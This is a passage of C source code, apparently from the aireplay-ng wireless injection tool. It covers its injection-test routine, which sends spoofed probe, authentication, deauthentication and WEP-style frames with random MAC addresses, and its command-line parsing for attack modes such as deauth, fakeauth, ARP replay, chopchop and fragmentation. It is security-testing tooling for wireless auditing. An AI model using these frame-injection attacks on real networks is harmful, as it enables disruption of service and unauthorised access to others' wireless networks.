5009
return 1;
5010
dev.fd_in = wi_fd(_wi_in);
5011
wi_get_mac(_wi_in, dev.mac_in);
5012
printf("\n");
5013
}
5014
5015
if(opt.port_in <= 0)
5016
{
5017
/* avoid blocking on reading the socket */
5018
if( fcntl( dev.fd_in, F_SETFL, O_NONBLOCK ) < 0 )
5019
{
5020
perror( "fcntl(O_NONBLOCK) failed" );
5021
return( 1 );
5022
}
5023
}
5024
5025
if(getnet(NULL, 0, 0) != 0)
5026
return 1;
5027
5028
srand( time( NULL ) );
5029
5030
memset(ap, '\0', 20*sizeof(struct APt));
5031
5032
essidlen = strlen(opt.r_essid);
5033
if( essidlen > 250) essidlen = 250;
5034
5035
if( essidlen > 0 )
5036
{
5037
ap[0].set = 1;
5038
ap[0].found = 0;
5039
ap[0].len = essidlen;
5040
memcpy(ap[0].essid, opt.r_essid, essidlen);
5041
ap[0].essid[essidlen] = '\0';
5042
memcpy(ap[0].bssid, opt.r_bssid, 6);
5043
found++;
5044
}
5045
5046
if(opt.bittest)
5047
set_bitrate(_wi_out, RATE_1M);
5048
5049
PCT; printf("Trying broadcast probe requests...\n");
5050
5051
memcpy(h80211, PROBE_REQ, 24);
5052
5053
len = 24;
5054
5055
h80211[24] = 0x00; //ESSID Tag Number
5056
h80211[25] = 0x00; //ESSID Tag Length
5057
5058
len += 2;
5059
5060
memcpy(h80211+len, RATES, 16);
5061
5062
len += 16;
5063
5064
gotit=0;
5065
answers=0;
5066
for(i=0; i<3; i++)
5067
{
5068
/*
5069
random source so we can identify our packets
5070
*/
5071
opt.r_smac[0] = 0x00;
5072
opt.r_smac[1] = rand() & 0xFF;
5073
opt.r_smac[2] = rand() & 0xFF;
5074
opt.r_smac[3] = rand() & 0xFF;
5075
opt.r_smac[4] = rand() & 0xFF;
5076
opt.r_smac[5] = rand() & 0xFF;
5077
5078
memcpy(h80211+10, opt.r_smac, 6);
5079
5080
send_packet(h80211, len);
5081
5082
gettimeofday( &tv, NULL );
5083
5084
while (1) //waiting for relayed packet
5085
{
5086
caplen = read_packet(packet, sizeof(packet), &ri);
5087
5088
if (packet[0] == 0x50 ) //Is probe response
5089
{
5090
if (! memcmp(opt.r_smac, packet+4, 6)) //To our MAC
5091
{
5092
if(grab_essid(packet, caplen) == 0 && (!memcmp(opt.r_bssid, NULL_MAC, 6)))
5093
{
5094
found++;
5095
}
5096
if(!answers)
5097
{
5098
PCT; printf("Injection is working!\n");
5099
if(opt.fast) return 0;
5100
gotit=1;
5101
answers++;
5102
}
5103
}
5104
}
5105
5106
if (packet[0] == 0x80 ) //Is beacon frame
5107
{
5108
if(grab_essid(packet, caplen) == 0 && (!memcmp(opt.r_bssid, NULL_MAC, 6)))
5109
{
5110
found++;
5111
}
5112
}
5113
5114
gettimeofday( &tv2, NULL );
5115
if (((tv2.tv_sec*1000000 - tv.tv_sec*1000000) + (tv2.tv_usec - tv.tv_usec)) > (3*atime*1000)) //wait 'atime'ms for an answer
5116
{
5117
break;
5118
}
5119
}
5120
}
5121
if(answers == 0)
5122
{
5123
PCT; printf("No Answer...\n");
5124
}
5125
5126
PCT; printf("Found %d AP%c\n", found, ((found == 1) ? ' ' : 's' ) );
5127
5128
if(found > 0)
5129
{
5130
printf("\n");
5131
PCT; printf("Trying directed probe requests...\n");
5132
}
5133
5134
for(i=0; i<found; i++)
5135
{
5136
if(wi_get_channel(_wi_out) != ap[i].chan)
5137
{
5138
wi_set_channel(_wi_out, ap[i].chan);
5139
}
5140
5141
if(wi_get_channel(_wi_in) != ap[i].chan)
5142
{
5143
wi_set_channel(_wi_in, ap[i].chan);
5144
}
5145
5146
PCT; printf("%02X:%02X:%02X:%02X:%02X:%02X - channel: %d - \'%s\'\n", ap[i].bssid[0], ap[i].bssid[1],
5147
ap[i].bssid[2], ap[i].bssid[3], ap[i].bssid[4], ap[i].bssid[5], ap[i].chan, ap[i].essid);
5148
5149
ap[i].found=0;
5150
min = INT_MAX;
5151
max = 0;
5152
avg = 0;
5153
avg2 = 0;
5154
5155
memcpy(h80211, PROBE_REQ, 24);
5156
5157
len = 24;
5158
5159
h80211[24] = 0x00; //ESSID Tag Number
5160
h80211[25] = ap[i].len; //ESSID Tag Length
5161
memcpy(h80211+len+2, ap[i].essid, ap[i].len);
5162
5163
len += ap[i].len+2;
5164
5165
memcpy(h80211+len, RATES, 16);
5166
5167
len += 16;
5168
5169
for(j=0; j<REQUESTS; j++)
5170
{
5171
/*
5172
random source so we can identify our packets
5173
*/
5174
opt.r_smac[0] = 0x00;
5175
opt.r_smac[1] = rand() & 0xFF;
5176
opt.r_smac[2] = rand() & 0xFF;
5177
opt.r_smac[3] = rand() & 0xFF;
5178
opt.r_smac[4] = rand() & 0xFF;
5179
opt.r_smac[5] = rand() & 0xFF;
5180
5181
//build/send probe request
5182
memcpy(h80211+10, opt.r_smac, 6);
5183
5184
send_packet(h80211, len);
5185
usleep(10);
5186
5187
//build/send request-to-send
5188
memcpy(nulldata, RTS, 16);
5189
memcpy(nulldata+4, ap[i].bssid, 6);
5190
memcpy(nulldata+10, opt.r_smac, 6);
5191
5192
send_packet(nulldata, 16);
5193
usleep(10);
5194
5195
//build/send null data packet
5196
memcpy(nulldata, NULL_DATA, 24);
5197
memcpy(nulldata+4, ap[i].bssid, 6);
5198
memcpy(nulldata+10, opt.r_smac, 6);
5199
memcpy(nulldata+16, ap[i].bssid, 6);
5200
5201
send_packet(nulldata, 24);
5202
usleep(10);
5203
5204
//build/send auth request packet
5205
memcpy(nulldata, AUTH_REQ, 30);
5206
memcpy(nulldata+4, ap[i].bssid, 6);
5207
memcpy(nulldata+10, opt.r_smac, 6);
5208
memcpy(nulldata+16, ap[i].bssid, 6);
5209
5210
send_packet(nulldata, 30);
5211
5212
//continue
5213
gettimeofday( &tv, NULL );
5214
5215
printf( "\r%2d/%2d: %3d%%\r", ap[i].found, j+1, ((ap[i].found*100)/(j+1)));
5216
fflush(stdout);
5217
while (1) //waiting for relayed packet
5218
{
5219
caplen = read_packet(packet, sizeof(packet), &ri);
5220
5221
if (packet[0] == 0x50 ) //Is probe response
5222
{
5223
if (! memcmp(opt.r_smac, packet+4, 6)) //To our MAC
5224
{
5225
if(! memcmp(ap[i].bssid, packet+16, 6)) //From the mentioned AP
5226
{
5227
gettimeofday( &tv3, NULL);
5228
ap[i].ping[j] = ((tv3.tv_sec*1000000 - tv.tv_sec*1000000) + (tv3.tv_usec - tv.tv_usec));
5229
if(!answers)
5230
{
5231
if(opt.fast)
5232
{
5233
PCT; printf("Injection is working!\n\n");
5234
return 0;
5235
}
5236
answers++;
5237
}
5238
ap[i].found++;
5239
if((signed)ri.ri_power > -200)
5240
ap[i].pwr[j] = (signed)ri.ri_power;
5241
break;
5242
}
5243
}
5244
}
5245
5246
if (packet[0] == 0xC4 ) //Is clear-to-send
5247
{
5248
if (! memcmp(opt.r_smac, packet+4, 6)) //To our MAC
5249
{
5250
gettimeofday( &tv3, NULL);
5251
ap[i].ping[j] = ((tv3.tv_sec*1000000 - tv.tv_sec*1000000) + (tv3.tv_usec - tv.tv_usec));
5252
if(!answers)
5253
{
5254
if(opt.fast)
5255
{
5256
PCT; printf("Injection is working!\n\n");
5257
return 0;
5258
}
5259
answers++;
5260
}
5261
ap[i].found++;
5262
if((signed)ri.ri_power > -200)
5263
ap[i].pwr[j] = (signed)ri.ri_power;
5264
break;
5265
}
5266
}
5267
5268
if (packet[0] == 0xD4 ) //Is ack
5269
{
5270
if (! memcmp(opt.r_smac, packet+4, 6)) //To our MAC
5271
{
5272
gettimeofday( &tv3, NULL);
5273
ap[i].ping[j] = ((tv3.tv_sec*1000000 - tv.tv_sec*1000000) + (tv3.tv_usec - tv.tv_usec));
5274
if(!answers)
5275
{
5276
if(opt.fast)
5277
{
5278
PCT; printf("Injection is working!\n\n");
5279
return 0;
5280
}
5281
answers++;
5282
}
5283
ap[i].found++;
5284
if((signed)ri.ri_power > -200)
5285
ap[i].pwr[j] = (signed)ri.ri_power;
5286
break;
5287
}
5288
}
5289
5290
if (packet[0] == 0xB0 ) //Is auth response
5291
{
5292
if (! memcmp(opt.r_smac, packet+4, 6)) //To our MAC
5293
{
5294
if (! memcmp(packet+10, packet+16, 6)) //From BSS ID
5295
{
5296
gettimeofday( &tv3, NULL);
5297
ap[i].ping[j] = ((tv3.tv_sec*1000000 - tv.tv_sec*1000000) + (tv3.tv_usec - tv.tv_usec));
5298
if(!answers)
5299
{
5300
if(opt.fast)
5301
{
5302
PCT; printf("Injection is working!\n\n");
5303
return 0;
5304
}
5305
answers++;
5306
}
5307
ap[i].found++;
5308
if((signed)ri.ri_power > -200)
5309
ap[i].pwr[j] = (signed)ri.ri_power;
5310
break;
5311
}
5312
}
5313
}
5314
5315
gettimeofday( &tv2, NULL );
5316
if (((tv2.tv_sec*1000000 - tv.tv_sec*1000000) + (tv2.tv_usec - tv.tv_usec)) > (atime*1000)) //wait 'atime'ms for an answer
5317
{
5318
break;
5319
}
5320
usleep(10);
5321
}
5322
printf( "\r%2d/%2d: %3d%%\r", ap[i].found, j+1, ((ap[i].found*100)/(j+1)));
5323
fflush(stdout);
5324
}
5325
for(j=0; j<REQUESTS; j++)
5326
{
5327
if(ap[i].ping[j] > 0)
5328
{
5329
if(ap[i].ping[j] > max) max = ap[i].ping[j];
5330
if(ap[i].ping[j] < min) min = ap[i].ping[j];
5331
avg += ap[i].ping[j];
5332
avg2 += ap[i].pwr[j];
5333
}
5334
}
5335
if(ap[i].found > 0)
5336
{
5337
avg /= ap[i].found;
5338
avg2 /= ap[i].found;
5339
PCT; printf("Ping (min/avg/max): %.3fms/%.3fms/%.3fms Power: %.2f\n", (min/1000.0), (avg/1000.0), (max/1000.0), avg2);
5340
}
5341
PCT; printf("%2d/%2d: %3d%%\n\n", ap[i].found, REQUESTS, ((ap[i].found*100)/REQUESTS));
5342
5343
if(!gotit && answers)
5344
{
5345
PCT; printf("Injection is working!\n\n");
5346
gotit=1;
5347
}
5348
}
5349
5350
if(opt.bittest)
5351
{
5352
if(found > 0)
5353
{
5354
PCT; printf("Trying directed probe requests for all bitrates...\n");
5355
}
5356
5357
for(i=0; i<found; i++)
5358
{
5359
if(ap[i].found <= 0)
5360
continue;
5361
printf("\n");
5362
PCT; printf("%02X:%02X:%02X:%02X:%02X:%02X - channel: %d - \'%s\'\n", ap[i].bssid[0], ap[i].bssid[1],
5363
ap[i].bssid[2], ap[i].bssid[3], ap[i].bssid[4], ap[i].bssid[5], ap[i].chan, ap[i].essid);
5364
5365
min = INT_MAX;
5366
max = 0;
5367
avg = 0;
5368
5369
memcpy(h80211, PROBE_REQ, 24);
5370
5371
len = 24;
5372
5373
h80211[24] = 0x00; //ESSID Tag Number
5374
h80211[25] = ap[i].len; //ESSID Tag Length
5375
memcpy(h80211+len+2, ap[i].essid, ap[i].len);
5376
5377
len += ap[i].len+2;
5378
5379
memcpy(h80211+len, RATES, 16);
5380
5381
len += 16;
5382
5383
for(k=0; k<RATE_NUM; k++)
5384
{
5385
ap[i].found=0;
5386
if(set_bitrate(_wi_out, bitrates[k]))
5387
continue;
5388
5389
5390
avg2 = 0;
5391
memset(ap[i].pwr, 0, REQUESTS*sizeof(unsigned int));
5392
5393
for(j=0; j<REQUESTS; j++)
5394
{
5395
/*
5396
random source so we can identify our packets
5397
*/
5398
opt.r_smac[0] = 0x00;
5399
opt.r_smac[1] = rand() & 0xFF;
5400
opt.r_smac[2] = rand() & 0xFF;
5401
opt.r_smac[3] = rand() & 0xFF;
5402
opt.r_smac[4] = rand() & 0xFF;
5403
opt.r_smac[5] = rand() & 0xFF;
5404
5405
memcpy(h80211+10, opt.r_smac, 6);
5406
5407
send_packet(h80211, len);
5408
5409
gettimeofday( &tv, NULL );
5410
5411
printf( "\r%2d/%2d: %3d%%\r", ap[i].found, j+1, ((ap[i].found*100)/(j+1)));
5412
fflush(stdout);
5413
while (1) //waiting for relayed packet
5414
{
5415
caplen = read_packet(packet, sizeof(packet), &ri);
5416
5417
if (packet[0] == 0x50 ) //Is probe response
5418
{
5419
if (! memcmp(opt.r_smac, packet+4, 6)) //To our MAC
5420
{
5421
if(! memcmp(ap[i].bssid, packet+16, 6)) //From the mentioned AP
5422
{
5423
if(!answers)
5424
{
5425
answers++;
5426
}
5427
ap[i].found++;
5428
if((signed)ri.ri_power > -200)
5429
ap[i].pwr[j] = (signed)ri.ri_power;
5430
break;
5431
}
5432
}
5433
}
5434
5435
gettimeofday( &tv2, NULL );
5436
if (((tv2.tv_sec*1000000 - tv.tv_sec*1000000) + (tv2.tv_usec - tv.tv_usec)) > (100*1000)) //wait 300ms for an answer
5437
{
5438
break;
5439
}
5440
usleep(10);
5441
}
5442
printf( "\r%2d/%2d: %3d%%\r", ap[i].found, j+1, ((ap[i].found*100)/(j+1)));
5443
fflush(stdout);
5444
}
5445
for(j=0; j<REQUESTS; j++)
5446
avg2 += ap[i].pwr[j];
5447
if(ap[i].found > 0)
5448
avg2 /= ap[i].found;
5449
PCT; printf("Probing at %2.1f Mbps:\t%2d/%2d: %3d%%\n", wi_get_rate(_wi_out)/1000000.0,
5450
ap[i].found, REQUESTS, ((ap[i].found*100)/REQUESTS));
5451
}
5452
5453
if(!gotit && answers)
5454
{
5455
PCT; printf("Injection is working!\n\n");
5456
if(opt.fast) return 0;
5457
gotit=1;
5458
}
5459
}
5460
}
5461
if(opt.bittest)
5462
set_bitrate(_wi_out, RATE_1M);
5463
5464
if( opt.s_face != NULL )
5465
{
5466
printf("\n");
5467
PCT; printf("Trying card-to-card injection...\n");
5468
5469
/* sync both cards to the same channel, or the test will fail */
5470
if(wi_get_channel(_wi_out) != wi_get_channel(_wi_in))
5471
{
5472
wi_set_channel(_wi_out, wi_get_channel(_wi_in));
5473
}
5474
5475
/* Attacks */
5476
for(i=0; i<5; i++)
5477
{
5478
k=0;
5479
/* random macs */
5480
opt.f_smac[0] = 0x00;
5481
opt.f_smac[1] = rand() & 0xFF;
5482
opt.f_smac[2] = rand() & 0xFF;
5483
opt.f_smac[3] = rand() & 0xFF;
5484
opt.f_smac[4] = rand() & 0xFF;
5485
opt.f_smac[5] = rand() & 0xFF;
5486
5487
opt.f_dmac[0] = 0x00;
5488
opt.f_dmac[1] = rand() & 0xFF;
5489
opt.f_dmac[2] = rand() & 0xFF;
5490
opt.f_dmac[3] = rand() & 0xFF;
5491
opt.f_dmac[4] = rand() & 0xFF;
5492
opt.f_dmac[5] = rand() & 0xFF;
5493
5494
opt.f_bssid[0] = 0x00;
5495
opt.f_bssid[1] = rand() & 0xFF;
5496
opt.f_bssid[2] = rand() & 0xFF;
5497
opt.f_bssid[3] = rand() & 0xFF;
5498
opt.f_bssid[4] = rand() & 0xFF;
5499
opt.f_bssid[5] = rand() & 0xFF;
5500
5501
if(i==0) //attack -0
5502
{
5503
memcpy( h80211, DEAUTH_REQ, 26 );
5504
memcpy( h80211 + 16, opt.f_bssid, 6 );
5505
memcpy( h80211 + 4, opt.f_dmac, 6 );
5506
memcpy( h80211 + 10, opt.f_smac, 6 );
5507
5508
opt.f_iswep = 0;
5509
opt.f_tods = 0; opt.f_fromds = 0;
5510
opt.f_minlen = opt.f_maxlen = 26;
5511
}
5512
else if(i==1) //attack -1 (open)
5513
{
5514
memcpy( h80211, AUTH_REQ, 30 );
5515
memcpy( h80211 + 4, opt.f_dmac, 6 );
5516
memcpy( h80211 + 10, opt.f_smac , 6 );
5517
memcpy( h80211 + 16, opt.f_bssid, 6 );
5518
5519
opt.f_iswep = 0;
5520
opt.f_tods = 0; opt.f_fromds = 0;
5521
opt.f_minlen = opt.f_maxlen = 30;
5522
}
5523
else if(i==2) //attack -1 (psk)
5524
{
5525
memcpy( h80211, ska_auth3, 24);
5526
memcpy( h80211 + 4, opt.f_dmac, 6);
5527
memcpy( h80211 + 10, opt.f_smac, 6);
5528
memcpy( h80211 + 16, opt.f_bssid, 6);
5529
5530
//iv+idx
5531
h80211[24] = 0x86;
5532
h80211[25] = 0xD8;
5533
h80211[26] = 0x2E;
5534
h80211[27] = 0x00;
5535
5536
//random bytes (as encrypted data)
5537
for(j=0; j<132; j++)
5538
h80211[28+j] = rand() & 0xFF;
5539
5540
opt.f_iswep = 1;
5541
opt.f_tods = 0; opt.f_fromds = 0;
5542
opt.f_minlen = opt.f_maxlen = 24+4+132;
5543
}
5544
else if(i==3) //attack -3
5545
{
5546
memcpy( h80211, NULL_DATA, 24);
5547
memcpy( h80211 + 4, opt.f_bssid, 6);
5548
memcpy( h80211 + 10, opt.f_smac, 6);
5549
memcpy( h80211 + 16, opt.f_dmac, 6);
5550
5551
//iv+idx
5552
h80211[24] = 0x86;
5553
h80211[25] = 0xD8;
5554
h80211[26] = 0x2E;
5555
h80211[27] = 0x00;
5556
5557
//random bytes (as encrypted data)
5558
for(j=0; j<132; j++)
5559
h80211[28+j] = rand() & 0xFF;
5560
5561
opt.f_iswep = -1;
5562
opt.f_tods = 1; opt.f_fromds = 0;
5563
opt.f_minlen = opt.f_maxlen = 24+4+132;
5564
}
5565
else if(i==4) //attack -5
5566
{
5567
memcpy( h80211, NULL_DATA, 24);
5568
memcpy( h80211 + 4, opt.f_bssid, 6);
5569
memcpy( h80211 + 10, opt.f_smac, 6);
5570
memcpy( h80211 + 16, opt.f_dmac, 6);
5571
5572
h80211[1] |= 0x04;
5573
h80211[22] = 0x0A;
5574
h80211[23] = 0x00;
5575
5576
//iv+idx
5577
h80211[24] = 0x86;
5578
h80211[25] = 0xD8;
5579
h80211[26] = 0x2E;
5580
h80211[27] = 0x00;
5581
5582
//random bytes (as encrypted data)
5583
for(j=0; j<7; j++)
5584
h80211[28+j] = rand() & 0xFF;
5585
5586
opt.f_iswep = -1;
5587
opt.f_tods = 1; opt.f_fromds = 0;
5588
opt.f_minlen = opt.f_maxlen = 24+4+7;
5589
}
5590
5591
for(j=0; (j<(REQUESTS/4) && !k); j++) //try it 5 times
5592
{
5593
send_packet( h80211, opt.f_minlen );
5594
5595
gettimeofday( &tv, NULL );
5596
while (1) //waiting for relayed packet
5597
{
5598
caplen = read_packet(packet, sizeof(packet), &ri);
5599
if ( filter_packet(packet, caplen) == 0 ) //got same length and same type
5600
{
5601
if(!answers)
5602
{
5603
answers++;
5604
}
5605
5606
if(i == 0) //attack -0
5607
{
5608
if( h80211[0] == packet[0] )
5609
{
5610
k=1;
5611
break;
5612
}
5613
}
5614
else if(i==1) //attack -1 (open)
5615
{
5616
if( h80211[0] == packet[0] )
5617
{
5618
k=1;
5619
break;
5620
}
5621
}
5622
else if(i==2) //attack -1 (psk)
5623
{
5624
if( h80211[0] == packet[0] && memcmp(h80211+24, packet+24, caplen-24) == 0 )
5625
{
5626
k=1;
5627
break;
5628
}
5629
}
5630
else if(i==3) //attack -2/-3/-4/-6
5631
{
5632
if( h80211[0] == packet[0] && memcmp(h80211+24, packet+24, caplen-24) == 0 )
5633
{
5634
k=1;
5635
break;
5636
}
5637
}
5638
else if(i==4) //attack -5/-7
5639
{
5640
if( h80211[0] == packet[0] && memcmp(h80211+24, packet+24, caplen-24) == 0 )
5641
{
5642
if( (packet[1] & 0x04) && memcmp( h80211+22, packet+22, 2 ) == 0 )
5643
{
5644
k=1;
5645
break;
5646
}
5647
}
5648
}
5649
}
5650
5651
gettimeofday( &tv2, NULL );
5652
if (((tv2.tv_sec*1000000 - tv.tv_sec*1000000) + (tv2.tv_usec - tv.tv_usec)) > (3*atime*1000)) //wait 3*'atime' ms for an answer
5653
{
5654
break;
5655
}
5656
usleep(10);
5657
}
5658
}
5659
if(k)
5660
{
5661
k=0;
5662
if(i==0) //attack -0
5663
{
5664
PCT; printf("Attack -0: OK\n");
5665
}
5666
else if(i==1) //attack -1 (open)
5667
{
5668
PCT; printf("Attack -1 (open): OK\n");
5669
}
5670
else if(i==2) //attack -1 (psk)
5671
{
5672
PCT; printf("Attack -1 (psk): OK\n");
5673
}
5674
else if(i==3) //attack -3
5675
{
5676
PCT; printf("Attack -2/-3/-4/-6: OK\n");
5677
}
5678
else if(i==4) //attack -5
5679
{
5680
PCT; printf("Attack -5/-7: OK\n");
5681
}
5682
}
5683
else
5684
{
5685
if(i==0) //attack -0
5686
{
5687
PCT; printf("Attack -0: Failed\n");
5688
}
5689
else if(i==1) //attack -1 (open)
5690
{
5691
PCT; printf("Attack -1 (open): Failed\n");
5692
}
5693
else if(i==2) //attack -1 (psk)
5694
{
5695
PCT; printf("Attack -1 (psk): Failed\n");
5696
}
5697
else if(i==3) //attack -3
5698
{
5699
PCT; printf("Attack -2/-3/-4/-6: Failed\n");
5700
}
5701
else if(i==4) //attack -5
5702
{
5703
PCT; printf("Attack -5/-7: Failed\n");
5704
}
5705
}
5706
}
5707
5708
if(!gotit && answers)
5709
{
5710
PCT; printf("Injection is working!\n");
5711
if(opt.fast) return 0;
5712
gotit=1;
5713
}
5714
}
5715
return 0;
5716
}
5717
5718
int main( int argc, char *argv[] )
5719
{
5720
int n, i, ret;
5721
5722
/* check the arguments */
5723
5724
memset( &opt, 0, sizeof( opt ) );
5725
memset( &dev, 0, sizeof( dev ) );
5726
5727
opt.f_type = -1; opt.f_subtype = -1;
5728
opt.f_minlen = -1; opt.f_maxlen = -1;
5729
opt.f_tods = -1; opt.f_fromds = -1;
5730
opt.f_iswep = -1; opt.ringbuffer = 8;
5731
5732
opt.a_mode = -1; opt.r_fctrl = -1;
5733
opt.ghost = 0;
5734
opt.delay = 15; opt.bittest = 0;
5735
opt.fast = 0; opt.r_smac_set = 0;
5736
opt.npackets = 1; opt.nodetect = 0;
5737
opt.rtc = 1; opt.f_retry = 0;
5738
5739
/* XXX */
5740
#if 0
5741
#if defined(__FreeBSD__)
5742
/*
5743
check what is our FreeBSD version. injection works
5744
only on 7-CURRENT so abort if it's a lower version.
5745
*/
5746
if( __FreeBSD_version < 700000 )
5747
{
5748
fprintf( stderr, "Aireplay-ng does not work on this "
5749
"release of FreeBSD.\n" );
5750
exit( 1 );
5751
}
5752
#endif
5753
#endif
5754
5755
while( 1 )
5756
{
5757
int option_index = 0;
5758
5759
static struct option long_options[] = {
5760
{"deauth", 1, 0, '0'},
5761
{"fakeauth", 1, 0, '1'},
5762
{"interactive", 0, 0, '2'},
5763
{"arpreplay", 0, 0, '3'},
5764
{"chopchop", 0, 0, '4'},
5765
{"fragment", 0, 0, '5'},
5766
{"caffe-latte", 0, 0, '6'},
5767
{"cfrag", 0, 0, '7'},
5768
{"test", 0, 0, '9'},
5769
{"help", 0, 0, 'H'},
5770
{"fast", 0, 0, 'F'},
5771
{"bittest", 0, 0, 'B'},
5772
{0, 0, 0, 0 }
5773
};
5774
5775
int option = getopt_long( argc, argv,
5776
"b:d:s:m:n:u:v:t:T:f:g:w:x:p:a:c:h:e:ji:r:k:l:y:o:q:0:1:2345679HFBDR",
5777
long_options, &option_index );
5778
5779
if( option < 0 ) break;
5780
5781
switch( option )
5782
{
5783
case 0 :
5784
5785
break;
5786
5787
case ':' :
5788
5789
printf("\"%s --help\" for help.\n", argv[0]);
5790
return( 1 );
5791
5792
case '?' :
5793
5794
printf("\"%s --help\" for help.\n", argv[0]);
5795
return( 1 );
5796
5797
case 'b' :
5798
5799
if( getmac( optarg, 1 ,opt.f_bssid ) != 0 )
5800
{
5801
printf( "Invalid BSSID (AP MAC address).\n" );
5802
printf("\"%s --help\" for help.\n", argv[0]);
5803
return( 1 );
5804
}
5805
break;
5806
5807
case 'd' :
5808
5809
if( getmac( optarg, 1, opt.f_dmac ) != 0 )
5810
{
5811
printf( "Invalid destination MAC address.\n" );
5812
printf("\"%s --help\" for help.\n", argv[0]);
5813
return( 1 );
5814
}
5815
break;
5816
5817
case 's' :
5818
5819
if( getmac( optarg, 1, opt.f_smac ) != 0 )
5820
{
5821
printf( "Invalid source MAC address.\n" );
5822
printf("\"%s --help\" for help.\n", argv[0]);
5823
return( 1 );
5824
}
5825
break;
5826
5827
case 'm' :
5828
5829
ret = sscanf( optarg, "%d", &opt.f_minlen );
5830
if( opt.f_minlen < 0 || ret != 1 )
5831
{
5832
printf( "Invalid minimum length filter. [>=0]\n" );
5833
printf("\"%s --help\" for help.\n", argv[0]);
5834
return( 1 );
5835
}
5836
break;
5837
5838
case 'n' :
5839
5840
ret = sscanf( optarg, "%d", &opt.f_maxlen );
5841
if( opt.f_maxlen < 0 || ret != 1 )
5842
{
5843
printf( "Invalid maximum length filter. [>=0]\n" );
5844
printf("\"%s --help\" for help.\n", argv[0]);
5845
return( 1 );
5846
}
5847
break;
5848
5849
case 'u' :
5850
5851
ret = sscanf( optarg, "%d", &opt.f_type );
5852
if( opt.f_type < 0 || opt.f_type > 3 || ret != 1 )
5853
{
5854
printf( "Invalid type filter. [0-3]\n" );
5855
printf("\"%s --help\" for help.\n", argv[0]);
5856
return( 1 );
5857
}
5858
break;
5859
5860
case 'v' :
5861
5862
ret = sscanf( optarg, "%d", &opt.f_subtype );
5863
if( opt.f_subtype < 0 || opt.f_subtype > 15 || ret != 1 )
5864
{
5865
printf( "Invalid subtype filter. [0-15]\n" );
5866
printf("\"%s --help\" for help.\n", argv[0]);
5867
return( 1 );
5868
}
5869
break;
5870
5871
case 'T' :
5872
ret = sscanf(optarg, "%d", &opt.f_retry);
5873
if ((opt.f_retry < 1) || (opt.f_retry > 65535) || (ret != 1)) {
5874
printf("Invalid retry setting. [1-65535]\n");
5875
printf("\"%s --help\" for help.\n", argv[0]);
5876
return(1);
5877
}
5878
break;
5879
5880
case 't' :
5881
5882
ret = sscanf( optarg, "%d", &opt.f_tods );
5883
if(( opt.f_tods != 0 && opt.f_tods != 1 ) || ret != 1 )
5884
{
5885
printf( "Invalid tods filter. [0,1]\n" );
5886
printf("\"%s --help\" for help.\n", argv[0]);
5887
return( 1 );
5888
}
5889
break;
5890
5891
case 'f' :
5892
5893
ret = sscanf( optarg, "%d", &opt.f_fromds );
5894
if(( opt.f_fromds != 0 && opt.f_fromds != 1 ) || ret != 1 )
5895
{
5896
printf( "Invalid fromds filter. [0,1]\n" );
5897
printf("\"%s --help\" for help.\n", argv[0]);
5898
return( 1 );
5899
}
5900
break;
5901
5902
case 'w' :
5903
5904
ret = sscanf( optarg, "%d", &opt.f_iswep );
5905
if(( opt.f_iswep != 0 && opt.f_iswep != 1 ) || ret != 1 )
5906
{
5907
printf( "Invalid wep filter. [0,1]\n" );
5908
printf("\"%s --help\" for help.\n", argv[0]);
5909
return( 1 );
5910
}
5911
break;
5912
5913
case 'x' :
5914
5915
ret = sscanf( optarg, "%d", &opt.r_nbpps );
5916
if( opt.r_nbpps < 1 || opt.r_nbpps > 1024 || ret != 1 )
5917
{
5918
printf( "Invalid number of packets per second. [1-1024]\n" );
5919
printf("\"%s --help\" for help.\n", argv[0]);
5920
return( 1 );
5921
}
5922
break;
5923
5924
case 'o' :
5925
5926
ret = sscanf( optarg, "%d", &opt.npackets );
5927
if( opt.npackets < 0 || opt.npackets > 512 || ret != 1 )
5928
{
5929
printf( "Invalid number of packets per burst. [0-512]\n" );
5930
printf("\"%s --help\" for help.\n", argv[0]);
5931
return( 1 );
5932
}
5933
break;
5934
5935
case 'q' :
5936
5937
ret = sscanf( optarg, "%d", &opt.delay );
5938
if( opt.delay < 1 || opt.delay > 600 || ret != 1 )
5939
{
5940
printf( "Invalid number of seconds. [1-600]\n" );
5941
printf("\"%s --help\" for help.\n", argv[0]);
5942
return( 1 );
5943
}
5944
break;
5945
5946
case 'p' :
5947
5948
ret = sscanf( optarg, "%x", &opt.r_fctrl );
5949
if( opt.r_fctrl < 0 || opt.r_fctrl > 65535 || ret != 1 )
5950
{
5951
printf( "Invalid frame control word. [0-65535]\n" );
5952
printf("\"%s --help\" for help.\n", argv[0]);
5953
return( 1 );
5954
}
5955
break;
5956
5957
case 'a' :
5958
5959
if( getmac( optarg, 1, opt.r_bssid ) != 0 )
5960
{
5961
printf( "Invalid AP MAC address.\n" );
5962
printf("\"%s --help\" for help.\n", argv[0]);
5963
return( 1 );
5964
}
5965
break;
5966
5967
case 'c' :
5968
5969
if( getmac( optarg, 1, opt.r_dmac ) != 0 )
5970
{
5971
printf( "Invalid destination MAC address.\n" );
5972
printf("\"%s --help\" for help.\n", argv[0]);
5973
return( 1 );
5974
}
5975
break;
5976
5977
case 'g' :
5978
5979
ret = sscanf( optarg, "%d", &opt.ringbuffer );
5980
if( opt.ringbuffer < 1 || ret != 1 )
5981
{
5982
printf( "Invalid replay ring buffer size. [>=1]\n");
5983
printf("\"%s --help\" for help.\n", argv[0]);
5984
return( 1 );
5985
}
5986
break;
5987
5988
case 'h' :
5989
5990
if( getmac( optarg, 1, opt.r_smac ) != 0 )
5991
{
5992
printf( "Invalid source MAC address.\n" );
5993
printf("\"%s --help\" for help.\n", argv[0]);
5994
return( 1 );
5995
}
5996
opt.r_smac_set=1;
5997
break;
5998
5999
case 'e' :
6000
6001
memset( opt.r_essid, 0, sizeof( opt.r_essid ) );
6002
strncpy( opt.r_essid, optarg, sizeof( opt.r_essid ) - 1 );
6003
break;
6004
6005
case 'j' :
6006
6007
opt.r_fromdsinj = 1;
6008
break;
6009
6010
case 'D' :
6011
6012
opt.nodetect = 1;
6013
break;
6014
6015
case 'k' :
6016
6017
inet_aton( optarg, (struct in_addr *) opt.r_dip );
6018
break;
6019
6020
case 'l' :
6021
6022
inet_aton( optarg, (struct in_addr *) opt.r_sip );
6023
break;
6024
6025
case 'y' :
6026
6027
if( opt.prga != NULL )
6028
{
6029
printf( "PRGA file already specified.\n" );
6030
printf("\"%s --help\" for help.\n", argv[0]);
6031
return( 1 );
6032
}
6033
if( read_prga(&(opt.prga), optarg) != 0 )
6034
{
6035
return( 1 );
6036
}
6037
break;
6038
6039
case 'i' :
6040
6041
if( opt.s_face != NULL || opt.s_file )
6042
{
6043
